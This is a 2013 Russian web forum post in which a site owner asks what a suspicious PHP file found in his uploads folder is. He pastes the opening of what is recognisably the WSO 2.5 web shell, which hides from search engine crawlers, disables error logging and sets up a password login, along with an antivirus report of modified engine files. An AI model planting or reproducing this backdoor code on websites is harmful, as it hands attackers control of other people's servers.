Что за PHP фал такой? - Форум о поисковых системах и социальных сетях

Страница 1 из 1
1

Что за PHP фал такой?

parwww

Понедельник, 18.03.2013, 15:46

Проверенный

Сообщения: 186

Репутация: 100

Кто скажет, что это за файл и какие функции он выполняет? Это не шел случайно? Случайно обнаружил в /uploads/addnews.php
Вот част кода с этого файла:

Код

<?
$auth_pass = "";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';

if(!empty($_SERVER['HTTP_USER_AGENT'])) {
      $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
      if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
          header('HTTP/1.0 404 Not Found');
          exit;
      }
}

@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('WSO_VERSION', '2.5');

if(get_magic_quotes_gpc()) {
     function WSOstripslashes($array) {
        return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
     }
     $_POST = WSOstripslashes($_POST);
      $_COOKIE = WSOstripslashes($_COOKIE);
}

function wsoLogin() {
     die("<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>");
}

function WSOsetcookie($k, $v) {
      $_COOKIE[$k] = $v;
      setcookie($k, $v);
}

if(!empty($auth_pass)) {
      if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))
          WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);

      if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
          wsoLogin();
}

if(strtolower(substr(PHP_OS,0,3)) == "win")
     $os = 'win';
else
     $os = 'nix';

$safe_mode = @ini_get('safe_mode');
if(!$safe_mode)
      error_reporting(0);

$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if(isset($_POST['c']))
     @chdir($_POST['c']);
$cwd = @getcwd();
if($os == 'win') {
     $home_cwd = str_replace("\\", "/", $home_cwd);
     $cwd = str_replace("\\", "/", $cwd);
}
if($cwd[strlen($cwd)-1] != '/')
     $cwd .= '/';

if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax']))
      $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$default_use_ajax;

И в антивирусе ДЛЕ выдало

./engine/data/dbconfig.php 4,6 Kb 11.03.2013 23:15:54 не соответствует сделанному снимку

./engine/init.php 17,79 Kb 11.03.2013 23:15:54 не соответствует сделанному снимку

./engine/engine.php 45,22 Kb 18.03.2013 02:42:36 не соответствует сделанному снимку

./engine/skins/def.skin.php 24,31 Kb 24.02.2013 16:17:26 не соответствует сделанному снимку

./templates/softo/main.tpl 17,95 Kb 04.03.2013 02:21:21 не соответствует сделанному снимку

./uploads/addnews.php 82,03 Kb 16.03.2013 20:36:00 не соответствует сделанному снимку

./index.php 13,2 Kb 11.03.2013 23:15:54 не соответствует сделанному снимку

Пост отредактировал parwww - Понедельник, 18.03.2013, 15:48

Профиль

Что за PHP фал такой?

Страница 1 из 1
1